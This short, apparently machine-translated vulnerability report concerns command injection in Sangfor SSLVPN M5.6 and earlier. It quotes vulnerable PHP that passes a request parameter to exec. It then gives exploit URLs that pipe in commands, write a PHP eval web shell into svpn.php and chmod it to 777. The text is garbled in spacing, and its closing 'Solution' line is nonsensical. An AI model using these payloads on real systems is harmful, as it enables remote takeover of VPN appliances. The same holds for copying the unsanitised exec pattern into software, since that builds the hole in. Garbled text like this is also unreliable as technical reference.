The security awareness of a convincing programmer is too low. You can directly execute any command with a single parameter $ args =$ _ REQUEST ['cmd']; /* something here */exec ("tsutil-proxy $ ip $ args", $ output, $ ret ); understand php exec functions are at a glance to see the problem version SSLVPN M5.6 and below did not test the latest version of the http://SSLVPN.SANGFOR.COM: 1000/cgi-bin/php-cgi/html/daemon/tsproxy. php? Cmd = ifconfig | echo % 20' % 3C? Php % 20 eval ($ _ POST [cmd]);? % 3E '% 20% 3E/app/usr/sbin/webui/html/svpn. php Execute echo' <? Php eval ($ _ POST [cmd]);?> '>/App/usr/sbin/webui/html/svpn. php generates a sentence http://SSLVPN.SANGFOR.COM: 1000/cgi-bin/php-cgi/html/daemon/tsproxy. php? Cmd = ifconfig | chmod 777/app/usr/sbin/webui/html/svpn. php modify svpn Permissions
SSLVPN. SANGFOR. COM is not a real address, just an example $ args =$ _ REQUEST ['cmd']; $ ip = $ _ SERVER ['remote _ ADDR ']; exec ("tsutil-proxy $ ip $ args", $ output, $ ret );Solution:What else can I do to find someone to be a programmer's security programming awareness training?